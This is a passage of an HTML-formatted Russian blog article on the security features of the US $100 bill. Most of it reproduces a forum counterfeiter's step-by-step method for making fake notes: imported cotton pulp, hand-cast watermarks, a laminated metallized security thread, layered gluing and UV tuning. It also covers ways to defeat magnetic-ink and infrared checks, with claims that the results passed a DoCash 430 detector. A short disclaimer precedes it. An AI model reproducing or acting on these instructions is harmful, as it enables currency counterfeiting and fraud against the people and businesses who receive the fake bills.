    &lt;li id=&quot;VWoW&quot;&gt;&lt;strong&gt;Металлизированные чернила&lt;/strong&gt;: Используются для печати заднего фона и элементов портрета.&lt;/li&gt;
    &lt;li id=&quot;aiqn&quot;&gt;&lt;strong&gt;Магнитная краска&lt;/strong&gt;: Серийный номер и некоторые детали содержат магнитные частицы (проверяется спецоборудованием).&lt;/li&gt;
    &lt;li id=&quot;JFeu&quot;&gt;&lt;strong&gt;УФ-метки&lt;/strong&gt;: При ультрафиолетовом свете защитная нить светится &lt;strong&gt;розовым&lt;/strong&gt;, а бумага не люминесцирует (подделки часто имеют фоновое свечение).&lt;/li&gt;
  &lt;/ul&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;8EIQ&quot;&gt;&lt;strong&gt;3. Основные элементы защиты&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;JZSJ&quot;&gt;&lt;strong&gt;3D Защитная лента (голограмма) &lt;/strong&gt;Это синяя лента с микротекстом &amp;quot;USA 100&amp;quot; и изображениями колоколов/числа &amp;quot;100&amp;quot;, которые двигаются при наклоне.&lt;/p&gt;
  &lt;p id=&quot;6tnl&quot;&gt;&lt;strong&gt;Водяной знак &lt;/strong&gt;Справа от портрета, видна на просвет, изображает &lt;strong&gt;портрет Франклина&lt;/strong&gt; (как на купюре) и число &amp;quot;100&amp;quot;, формируется с помощью уплотнений бумаги&lt;/p&gt;
  &lt;p id=&quot;lby6&quot;&gt;&lt;strong&gt;Защитная нить &lt;/strong&gt;Вертикальная нить с надписью &amp;quot;USA 100&amp;quot;, видимая на просвет. При УФ-свете светится розовым.&lt;/p&gt;
  &lt;p id=&quot;mmn2&quot;&gt;&lt;strong&gt;Микропечать &lt;/strong&gt;Расположенные в разных частях купюры надписи:&lt;/p&gt;
  &lt;ul id=&quot;hTZM&quot;&gt;
    &lt;li id=&quot;EKm3&quot;&gt;Воротник Франклина: надпись &amp;quot;THE UNITED STATES OF AMERICA&amp;quot;.&lt;/li&gt;
    &lt;li id=&quot;1j7m&quot;&gt;Края купюры: повторяющиеся &amp;quot;USA 100&amp;quot;.&lt;/li&gt;
    &lt;li id=&quot;nTZq&quot;&gt;Основание чернильницы: &amp;quot;ONE HUNDRED USA&amp;quot;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;yvuF&quot;&gt;&lt;strong&gt;Рельефная печать &lt;/strong&gt;На плече Франклина и надписи &amp;quot;ONE HUNDRED DOLLARS&amp;quot;, которая ощущается, если провести ногтем.&lt;/p&gt;
  &lt;blockquote id=&quot;tXQQ&quot;&gt;Как вы думаете сколько усилий требуется для подделки такого рода купюры и тестов на различных детекторах?&lt;/blockquote&gt;
  &lt;p id=&quot;y35R&quot;&gt;Вообще более детально можете рассмотреть данную купюру на следующем сайте — www.uscurrency.gov, либо если вам интересны купюры других стран, то вам на banknotedb.com&lt;/p&gt;
  &lt;section&gt;
    &lt;h2 id=&quot;r2lN&quot;&gt;3. Процесс изготовления купюр&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;sGMB&quot;&gt;Хотелось бы сказать, что этот процесс расписан не для того, чтобы вы повторяли, хотя у вас это вряд ли выйдет, но всё же, тут я вам продемонстрирую, как фальшивомонетчики изготавливают купюры и проверяют их на валидность. Данная инструкция написана на RUTOR человеком, который собственно ручно сделал клише и смог напечатать купюры, которые обошли детекторы — &lt;a href=&quot;https://rutor8.com/search/5560317/?c%5Busers%5D=shumaher&amp;o=date&quot; target=&quot;_blank&quot;&gt;Shumaher&lt;/a&gt;&lt;/p&gt;
  &lt;figure id=&quot;FEQx&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/3f/80/3f808f3f-9126-4278-b39d-fe17f46ca823.png&quot; width=&quot;1816&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;EuJs&quot;&gt;&lt;em&gt;Далее следует процесс изготовления, если читать неинтересно, переходим к следующему пункту, кликая на ссылку — &lt;a href=&quot;/@parabellumclan/Fq8rg25V-2D#v94h&quot;&gt;сим-пам-бим:&lt;/a&gt;&lt;/em&gt;&lt;br /&gt;Пока &lt;strong&gt;ничего лучше и дешевле бумаги&lt;/strong&gt; для изготовления фантиков не придумано. Чем популярнее бумага и больше ее оборот, тем жаднее государства и тем сильнее они стараются сэкономить на процессе печати.&lt;/p&gt;
  &lt;blockquote id=&quot;f1F4&quot;&gt;&lt;em&gt;&amp;quot;Чем выше спрос — тем ниже себестоимость, но не спешите радоваться: экономия чаще всего касается только производителей.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;Ow1h&quot;&gt;Если заглянуть в историю, можно с удивлением обнаружить, что уже более &lt;strong&gt;100 лет&lt;/strong&gt; состав бумажных листов практически не меняется: &lt;em&gt;&lt;strong&gt;75% хлопка и 25% льна&lt;/strong&gt;&lt;/em&gt;. А вот формула клея, используемого в производстве, остается засекреченной. Единственное, что можно утверждать с высокой вероятностью — он состоит в основном из животного клея, а именно &lt;strong&gt;костного или желатинового&lt;/strong&gt;. В него добавляют &lt;em&gt;&lt;strong&gt;пластификатор (глицерин)&lt;/strong&gt;&lt;/em&gt;, дубящие вещества и оптический наполнитель.&lt;/p&gt;
  &lt;blockquote id=&quot;Bzag&quot;&gt;&lt;em&gt;&amp;quot;Настоящая бумага не светится в ультрафиолете. Запомните это, когда будете сравнивать офисные листы и настоящие купюры.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;Ezyd&quot;&gt;Оригинальную бумагу изготавливают по классическим технологиям, и при желании можно найти на &lt;strong&gt;YouTube&lt;/strong&gt; множество роликов о процессе ее производства. Однако этот метод &lt;strong&gt;не подходит&lt;/strong&gt; по ряду причин:&lt;/p&gt;
  &lt;ul id=&quot;0Os6&quot;&gt;
    &lt;li id=&quot;wuOM&quot;&gt;Он требует &lt;strong&gt;огромных площадей&lt;/strong&gt;,&lt;/li&gt;
    &lt;li id=&quot;bxhg&quot;&gt;&lt;strong&gt;Значительных объемов сырья&lt;/strong&gt;,&lt;/li&gt;
    &lt;li id=&quot;V0OI&quot;&gt;&lt;strong&gt;Серьезных финансовых вложений&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;ORnn&quot;&gt;Мы же, напротив, &lt;strong&gt;не стремимся привлекать лишнее внимание&lt;/strong&gt;.&lt;/p&gt;
  &lt;h3 id=&quot;KLyV&quot;&gt;Альтернативные пути&lt;/h3&gt;
  &lt;p id=&quot;mLi5&quot;&gt;Пропуская сложные этапы, такие как &lt;em&gt;&lt;strong&gt;фибрилляция бумажной массы в ролле&lt;/strong&gt;&lt;/em&gt; или &lt;strong&gt;отливка на промышленной бумагоделательной машине&lt;/strong&gt;, можно сосредоточиться на более доступных методах. Конечно, если есть желание, можно попробовать:&lt;/p&gt;
  &lt;ul id=&quot;VHnD&quot;&gt;
    &lt;li id=&quot;VDYk&quot;&gt;Размалывать хлопковое волокно с помощью специальной машины (&lt;em&gt;beater&lt;/em&gt;).&lt;/li&gt;
    &lt;li id=&quot;YY45&quot;&gt;Изготавливать бумагу вручную на аналоге листоотливной машины &lt;em&gt;&lt;strong&gt;ЛОА-1&lt;/strong&gt;&lt;/em&gt;.&lt;/li&gt;
    &lt;li id=&quot;lW0U&quot;&gt;Затем &lt;strong&gt;склеивать листы вручную&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;r0ZY&quot;&gt;Но этот путь требует &lt;strong&gt;слишком много времени и ресурсов&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;qaQD&quot;&gt;Гораздо разумнее обратить внимание на &lt;strong&gt;«китайских партнеров»&lt;/strong&gt;, которые предлагают огромное разнообразие полуфабрикатов:&lt;/p&gt;
  &lt;ul id=&quot;Hy9f&quot;&gt;
    &lt;li id=&quot;YEnj&quot;&gt;&lt;em&gt;&lt;strong&gt;Бумажная масса&lt;/strong&gt;&lt;/em&gt; разного состава и степени помола,&lt;/li&gt;
    &lt;li id=&quot;PjfD&quot;&gt;&lt;strong&gt;Готовые листы формата A4&lt;/strong&gt; с нужной плотностью и текстурой,&lt;/li&gt;
    &lt;li id=&quot;sj4G&quot;&gt;Включения &lt;em&gt;&lt;strong&gt;синих и красных волокон&lt;/strong&gt;&lt;/em&gt; для максимального сходства.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;blockquote id=&quot;sSzr&quot;&gt;&lt;em&gt;&amp;quot;Почему бы не воспользоваться тем, что уже доступно, вместо того, чтобы изобретать велосипед?&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;h3 id=&quot;1YSb&quot;&gt;Вопрос соответствия стандартам&lt;/h3&gt;
  &lt;p id=&quot;a3gT&quot;&gt;Если перед нами стоит цель создания изделий, которые &lt;strong&gt;будут приниматься купюроприемниками&lt;/strong&gt; и счетными машинами, важно учитывать нюансы детекции.&lt;/p&gt;
  &lt;p id=&quot;BhnG&quot;&gt;Некоторые аппараты проверяют наличие &lt;strong&gt;водяного знака&lt;/strong&gt; как изменение плотности и толщины листа. Другие распознают &lt;strong&gt;пластиковую нить с металлизированным текстом&lt;/strong&gt;, светящимся в УФ.&lt;/p&gt;
  &lt;blockquote id=&quot;VSE2&quot;&gt;&lt;em&gt;&amp;quot;Попробовать напечатать водяной знак и защитную ленту на одном из слоев, а затем просто склеить этот «бутерброд»? Почему бы и нет... но такой вариант может не дать желаемого результата.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;h3 id=&quot;aDjG&quot;&gt;Листоотливная машина ЛОА-1&lt;/h3&gt;
  &lt;p id=&quot;5vRu&quot;&gt;Что касается &lt;strong&gt;ЛОА-1&lt;/strong&gt;, то я решил адаптировать ее принцип работы для создания водяных знаков. В двух словах, она представляет собой &lt;em&gt;&lt;strong&gt;съемный аквариум с листоотливной сеткой на дне&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
  &lt;p id=&quot;eQjH&quot;&gt;Процесс работы:&lt;/p&gt;
  &lt;ol id=&quot;6Lwh&quot;&gt;
    &lt;li id=&quot;RIkZ&quot;&gt;Через сетку &lt;strong&gt;снизу заливается вода&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;Mzej&quot;&gt;В этой воде &lt;strong&gt;распределяется бумажная масса&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;hPTG&quot;&gt;&lt;strong&gt;Вода сливается&lt;/strong&gt;, оставляя бумажные волокна на сетке.&lt;/li&gt;
    &lt;li id=&quot;cT3p&quot;&gt;&lt;strong&gt;Аквариум разбирается&lt;/strong&gt;, снимается сетка с влажной массой.&lt;/li&gt;
    &lt;li id=&quot;kNu4&quot;&gt;Полученный лист &lt;strong&gt;высушивается&lt;/strong&gt; и превращается в готовую бумагу.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;G46r&quot;&gt;Этот процесс позволяет экспериментировать с &lt;strong&gt;плотностью и текстурой материала&lt;/strong&gt;, создавая различные эффекты, включая &lt;strong&gt;водяные знаки&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;CWAm&quot;&gt;&lt;em&gt;&amp;quot;Иногда секрет кроется не в сложных технологиях, а в умении найти правильный баланс между простотой и эффективностью.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;figure id=&quot;SFhB&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b9/cd/b9cda222-62e7-45a9-b8e7-316b59529957.png&quot; width=&quot;1475&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;yTV3&quot;&gt;В процессе работы я &lt;strong&gt;модифицировал конструкцию&lt;/strong&gt;, отказавшись от классических сеток и заменив их &lt;strong&gt;сетчатыми трафаретами&lt;/strong&gt; с портретами Франклина. На эти трафареты наносилась волокнистая масса, затем материал сушился, и в итоге получались &lt;strong&gt;локальные водяные знаки&lt;/strong&gt;.&lt;/p&gt;
  &lt;figure id=&quot;PcGt&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/da/51/da51f46a-3bdc-489e-8e5d-9c3a16342ab5.png&quot; width=&quot;1475&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;ayAe&quot;&gt;&lt;em&gt;&amp;quot;На удивление, все элементы отлично держатся – даже такие мелкие детали, как рот и нос, никуда не сползают.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;figure id=&quot;Td3o&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/99/52/9952a15d-4778-40a8-a87d-ce55fcf20ab2.png&quot; width=&quot;1475&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;PzWI&quot;&gt;Бумажную массу я заказывал на &lt;strong&gt;Alibaba&lt;/strong&gt;, а в качестве основы использовал заготовки &lt;strong&gt;36-38 gsm&lt;/strong&gt; из хлопковой бумаги с уже внедренными &lt;strong&gt;красными и синими волокнами&lt;/strong&gt;.&lt;/p&gt;
  &lt;h3 id=&quot;s2lv&quot;&gt;Почему хлопковая или хлопково-льняная бумага?&lt;/h3&gt;
  &lt;blockquote id=&quot;4PMT&quot;&gt;&lt;em&gt;&amp;quot;Есть такой химический детектор-карандаш, который реагирует на древесно-целлюлозные волокна. А хлопок — нет. Найдете древесную бумагу без свечения в УФ — можете попробовать, но я лично такого не встречал.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;WZYg&quot;&gt;Теперь о &lt;strong&gt;защитной ленте&lt;/strong&gt;. Процесс выглядел так:&lt;/p&gt;
  &lt;ol id=&quot;ofhJ&quot;&gt;
    &lt;li id=&quot;350V&quot;&gt;Печатался &lt;strong&gt;негатив нужного изображения&lt;/strong&gt; на лазерном принтере.&lt;/li&gt;
    &lt;li id=&quot;liwt&quot;&gt;Через ламинатор &lt;strong&gt;накатывалась металлизированная термотрансферная пленка&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;Lgvj&quot;&gt;Затем бумага удалялась, а на руках оставалась &lt;strong&gt;тончайшая пленка с металлизированным изображением&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;xLpd&quot;&gt;Ленты разрезались и &lt;strong&gt;имплементировались в толщу бумаги&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;nKn4&quot;&gt;На финальном этапе ленты &lt;strong&gt;окрашивались прозрачными водостойкими чернилами&lt;/strong&gt;, светящимися в &lt;strong&gt;красном УФ-спектре&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;blockquote id=&quot;AosQ&quot;&gt;&lt;em&gt;&amp;quot;Порезка и окрашивание выполнялись на специализированных оснастках – руками это делать бессмысленно.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;h3 id=&quot;gECR&quot;&gt;Сборка и сушка&lt;/h3&gt;
  &lt;p id=&quot;EMId&quot;&gt;На &lt;strong&gt;«стапеле с подсветкой»&lt;/strong&gt; выполнялась первичная сборка:&lt;/p&gt;
  &lt;ul id=&quot;VlLq&quot;&gt;
    &lt;li id=&quot;VBqE&quot;&gt;Приклеивание &lt;strong&gt;водяного знака и ленты&lt;/strong&gt; на свои места на одном из слоев «бутерброда».&lt;/li&gt;
    &lt;li id=&quot;3qdS&quot;&gt;Первичная сушка на &lt;strong&gt;барабанной сушильной машине&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;cwMD&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/99/65/99653afa-10aa-4fec-9ff4-3263ab8e4b08.png&quot; width=&quot;1475&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Gz65&quot;&gt;&lt;strong&gt;Почему барабанная сушилка?&lt;/strong&gt; Без нее &lt;strong&gt;тонкие листы сильно коробятся&lt;/strong&gt;, и переход к окончательной сборке становится проблематичным.&lt;/p&gt;
  &lt;h3 id=&quot;Qnjh&quot;&gt;Окончательная сборка&lt;/h3&gt;
  &lt;p id=&quot;1L3y&quot;&gt;Склейка готового листа выполнялась на &lt;strong&gt;листособирающей машине&lt;/strong&gt;. Два листа складывались в &lt;strong&gt;роликовом сборщике&lt;/strong&gt; через лавсановую сетку.&lt;br /&gt;Во время сборки в середину проливался &lt;strong&gt;клей&lt;/strong&gt;, после чего происходило первичное &lt;strong&gt;прикатывание листов&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;rWuM&quot;&gt;&lt;em&gt;&amp;quot;Главный недостаток метода – сложность настройки: пузырьки, неравномерная плотность, брак. На данный момент идет тестирование &lt;strong&gt;вакуумного пресса с шелкотрафаретным нанесением клея&lt;/strong&gt; – процесс менее быстрый, но более качественный.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;figure id=&quot;G3YY&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/df/be/dfbe553c-94f5-4585-b385-d63876f1eb46.png&quot; width=&quot;2610&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Z8Hz&quot;&gt;&lt;strong&gt;Ручная сборка возможна&lt;/strong&gt;, но только после огромного количества &lt;strong&gt;потраченного материала&lt;/strong&gt; и набивания кучи шишек.&lt;/p&gt;
  &lt;h3 id=&quot;iwWp&quot;&gt;Вопрос УФ-свечения&lt;/h3&gt;
  &lt;p id=&quot;zKOL&quot;&gt;Один из сложных моментов – добиться &lt;strong&gt;корректного фонового УФ-эффекта&lt;/strong&gt;.&lt;/p&gt;
  &lt;ul id=&quot;HAgb&quot;&gt;
    &lt;li id=&quot;rTbT&quot;&gt;&lt;strong&gt;100 USD&lt;/strong&gt; имеет &lt;strong&gt;слабое желтоватое свечение&lt;/strong&gt; в УФ.&lt;/li&gt;
    &lt;li id=&quot;7Av8&quot;&gt;Евро и рубли – &lt;strong&gt;темное красно-синее свечение&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;uhdH&quot;&gt;&lt;strong&gt;Китайские заготовки&lt;/strong&gt; практически идентичны евро и рублям, но для &lt;strong&gt;100 USD&lt;/strong&gt; пришлось дорабатывать проклейку.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;blockquote id=&quot;61av&quot;&gt;&lt;em&gt;&amp;quot;Желтоватые заготовки изначально не рассматривались – все равно пришлось бы делать поверхностную проклейку или окраску.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;XRGE&quot;&gt;Также &lt;strong&gt;поверхностная проклейка с последующим дублением&lt;/strong&gt; не только &lt;strong&gt;улучшает водостойкость&lt;/strong&gt;, но и придает &lt;strong&gt;характерный хруст&lt;/strong&gt;, приближая бумагу к оригинальной.&lt;/p&gt;
  &lt;figure id=&quot;EPXW&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/67/2a/672a5d32-0ebb-492c-b822-bba77d2cb0d0.png&quot; width=&quot;1195&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;mfcm&quot;&gt;По &lt;strong&gt;скромным расчетам&lt;/strong&gt;, такой процесс позволяет получать &lt;strong&gt;до 20 000 листов A4 в месяц&lt;/strong&gt;, &lt;strong&gt;без круглосуточного рабского труда&lt;/strong&gt;.&lt;/p&gt;
  &lt;h3 id=&quot;ikJU&quot;&gt;Оптимизация затрат&lt;/h3&gt;
  &lt;h4 id=&quot;8XOl&quot;&gt;Размол бумажной массы&lt;/h4&gt;
  &lt;p id=&quot;LHH6&quot;&gt;Вместо организации бумажной мельницы я решил не тратить время на изготовление бумажной массы с нуля, а просто купил &lt;strong&gt;хлопковую бумажную массу разной степени помола&lt;/strong&gt; на &lt;strong&gt;Alibaba&lt;/strong&gt;.&lt;/p&gt;
  &lt;h4 id=&quot;1sBV&quot;&gt;Отливка листов&lt;/h4&gt;
  &lt;p id=&quot;uMy7&quot;&gt;На &lt;strong&gt;ЛОА-1&lt;/strong&gt; за одну отливку я получаю &lt;strong&gt;20 водяных знаков&lt;/strong&gt;. Если бы я отливал сразу &lt;strong&gt;полноразмерные листы&lt;/strong&gt;, процесс замедлился бы &lt;strong&gt;в 5 раз&lt;/strong&gt; и процент брака был бы выше. Конечно, с практикой уровень брака уменьшается, но зачем тратить месяцы на обучение, если можно сразу выйти на нужную производительность?&lt;/p&gt;
  &lt;h4 id=&quot;05Ia&quot;&gt;Печать защитной ленты&lt;/h4&gt;
  &lt;p id=&quot;UNvc&quot;&gt;Можно было бы собрать &lt;strong&gt;станок для прямого термотрансфера&lt;/strong&gt; и отказаться от лазерного принтера. Однако это дополнительные &lt;strong&gt;десятки тысяч долларов вложений&lt;/strong&gt;, а разница в качестве минимальна, поскольку &lt;strong&gt;лента все равно скрыта в толще бумаги&lt;/strong&gt;.&lt;/p&gt;
  &lt;h4 id=&quot;gLkD&quot;&gt;Заказная бумага&lt;/h4&gt;
  &lt;p id=&quot;A5KS&quot;&gt;Я покупал &lt;strong&gt;готовые хлопковые заготовки&lt;/strong&gt; нужной плотности из доступного ассортимента. Проклейка и окраска &lt;strong&gt;все равно требуются&lt;/strong&gt;, а льняные волокна можно выявить только экспертным анализом в &lt;strong&gt;Бюро печати США&lt;/strong&gt;. Если уж изделие окажется под таким вниманием, то оно «попалится» на чем-то еще.&lt;/p&gt;
  &lt;h3 id=&quot;GgNd&quot;&gt;Вакуумный пресс и дальнейшие улучшения&lt;/h3&gt;
  &lt;p id=&quot;VyPl&quot;&gt;Сейчас изготавливается &lt;strong&gt;сборочный вакуумный пресс (pic9.jpg)&lt;/strong&gt; для более &lt;strong&gt;точной сборки&lt;/strong&gt;, в том числе для работы с &lt;strong&gt;ныряющей нитью&lt;/strong&gt;.&lt;/p&gt;
  &lt;ul id=&quot;DmA7&quot;&gt;
    &lt;li id=&quot;3JsF&quot;&gt;&lt;strong&gt;Плюс:&lt;/strong&gt; дешевле, чем листособирающая машина.&lt;/li&gt;
    &lt;li id=&quot;IH4t&quot;&gt;&lt;strong&gt;Минус:&lt;/strong&gt; ниже производительность.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;pf93&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/4b/fe/4bfebc7b-edf2-4681-8a5d-2f7edc2f44aa.png&quot; width=&quot;3793&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ewSp&quot;&gt;В целом, &lt;strong&gt;каждая задача требует индивидуального подхода&lt;/strong&gt; – в зависимости от возможностей и целей клиента.&lt;/p&gt;
  &lt;h3 id=&quot;i7Z2&quot;&gt;Цена вопроса&lt;/h3&gt;
  &lt;blockquote id=&quot;o4Ix&quot;&gt;&lt;em&gt;&amp;quot;Хотите качественный фальш? Готовьтесь платить – либо деньгами, либо временем.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;awhz&quot;&gt;Полный комплект &lt;strong&gt;бумагоделательного оборудования&lt;/strong&gt; «под ключ» стоит &lt;strong&gt;от $500 000 до $2 000 000&lt;/strong&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;rA8y&quot;&gt;Машиночитаемые метки: детекция и распространенность&lt;/h3&gt;
  &lt;p id=&quot;LYq7&quot;&gt;Перед тем как углубляться в технологию, разберемся, какие параметры &lt;strong&gt;проверяются валидаторами&lt;/strong&gt;.&lt;/p&gt;
  &lt;h4 id=&quot;Axqo&quot;&gt;1. УФ-свечение бумаги&lt;/h4&gt;
  &lt;p id=&quot;jcsC&quot;&gt;&lt;strong&gt;Отсутствие фонового свечения&lt;/strong&gt; – &lt;strong&gt;самый базовый признак подлинности&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;W6TY&quot;&gt;&lt;em&gt;&amp;quot;Практически вся офисная бумага светится в УФ, как новогодняя елка. Если изделие обладает такой светимостью – 100% детекторов его отбракуют.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;JAG6&quot;&gt;В нашем случае эта степень защиты была устранена &lt;strong&gt;на этапе изготовления бумаги&lt;/strong&gt;. Это позволило избежать проблем с базовой детекцией.&lt;/p&gt;
  &lt;p id=&quot;mFnR&quot;&gt;Также подобные &lt;strong&gt;датчики УФ-свечения&lt;/strong&gt; используются в &lt;strong&gt;режиме просвета&lt;/strong&gt; для проверки наличия &lt;strong&gt;светящейся в УФ металлизированной ленты&lt;/strong&gt;.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;Ph3g&quot;&gt;2. Магнитные краски&lt;/h3&gt;
  &lt;p id=&quot;vAOc&quot;&gt;Лицевая сторона &lt;strong&gt;100 USD&lt;/strong&gt;, как и другие купюры, выполнена с применением &lt;strong&gt;магнитной карты&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;yHJh&quot;&gt;&lt;em&gt;&amp;quot;Самый простой способ ее детекции — магнитная головка, сложный — магнитный визуализатор, строящий часть или всю магнитную картинку.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;5RX0&quot;&gt;Каждый номинал купюры &lt;strong&gt;имеет свою карту магнитных меток&lt;/strong&gt;, по которой валидатор и определяет номинал.&lt;/p&gt;
  &lt;p id=&quot;4ehs&quot;&gt;&lt;strong&gt;Где встречаются магнитные головки?&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;dWHa&quot;&gt;
    &lt;li id=&quot;oARi&quot;&gt;В &lt;strong&gt;ручных валидаторах&lt;/strong&gt; – вы проводите купюрой через выступающую магнитную головку, детектор &lt;strong&gt;моргает светодиодом&lt;/strong&gt;, подтверждая наличие магнитных чернил.&lt;/li&gt;
    &lt;li id=&quot;PZf9&quot;&gt;В &lt;strong&gt;банковских терминалах и АТМах&lt;/strong&gt; – там система более сложная и проверяет карту целиком.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;gqkX&quot;&gt;&lt;strong&gt;Как обойти этот уровень защиты?&lt;/strong&gt;&lt;/p&gt;
  &lt;ol id=&quot;yzkD&quot;&gt;
    &lt;li id=&quot;xLYI&quot;&gt;Напечатать лицевую сторону &lt;strong&gt;лазерным принтером в несколько проходов&lt;/strong&gt;, но это приведет к &lt;strong&gt;раздвоению изображения&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;GjH6&quot;&gt;Использовать &lt;strong&gt;специальный магнитный тонер&lt;/strong&gt;, предназначенный для печати штрих-кодов.&lt;/li&gt;
    &lt;li id=&quot;XRJX&quot;&gt;Разделить печать:&lt;/li&gt;
    &lt;ul id=&quot;juQA&quot;&gt;
      &lt;li id=&quot;LdHV&quot;&gt;Часть изображения печатается &lt;strong&gt;магнитной краской&lt;/strong&gt;.&lt;/li&gt;
      &lt;li id=&quot;wUPW&quot;&gt;Остальная часть наносится &lt;strong&gt;обычными красками&lt;/strong&gt; струйного или лазерного принтера.&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/ol&gt;
  &lt;figure id=&quot;XvCG&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/44/d3/44d3cfd8-1350-48f4-ab10-071bf11065fc.png&quot; width=&quot;2022&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote id=&quot;v9lC&quot;&gt;&lt;em&gt;&amp;quot;Проверял этот метод — купюры, напечатанные с такой технологией, успешно проходили в детекторах DoCash 430, но вот АТМы их не принимали.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;77HM&quot;&gt;Также этот же &lt;strong&gt;магнитный датчик&lt;/strong&gt; используется для проверки &lt;strong&gt;внедренной металлизированной ленты&lt;/strong&gt;.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;trnO&quot;&gt;3. Инфракрасные метамерные краски&lt;/h3&gt;
  &lt;p id=&quot;xEMd&quot;&gt;&lt;strong&gt;Метамерные краски&lt;/strong&gt; в видимом спектре выглядят одинаково, но в &lt;strong&gt;ИК-диапазоне&lt;/strong&gt; отражаются &lt;strong&gt;по-разному&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;gIln&quot;&gt;&lt;em&gt;&amp;quot;Например, на обратной стороне 100 USD в видимом спектре изображение выглядит зеленым, но в ИК-диапазоне оно дает две четко различимые белые полосы.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;figure id=&quot;63gV&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d3/9a/d39af395-9e83-4332-a76c-7ee40af7400a.png&quot; width=&quot;2022&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;iCBX&quot;&gt;&lt;strong&gt;Эксперименты&lt;/strong&gt;:&lt;/p&gt;
  &lt;ul id=&quot;IQsb&quot;&gt;
    &lt;li id=&quot;xiyy&quot;&gt;Я пробовал печатать часть изображения &lt;strong&gt;цветным лазерным принтером&lt;/strong&gt;, смешивая цвета для создания &lt;strong&gt;метамерного эффекта&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;oCk7&quot;&gt;Комбинировал &lt;strong&gt;голубой и желтый&lt;/strong&gt; (зеленый, не поглощающий ИК) с &lt;strong&gt;голубым, желтым и красным&lt;/strong&gt; (зеленый, поглощающий ИК).&lt;/li&gt;
    &lt;li id=&quot;lUvk&quot;&gt;Как ни странно, такая комбинация &lt;strong&gt;была успешно принята детектором DoCash 430&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;hr /&gt;
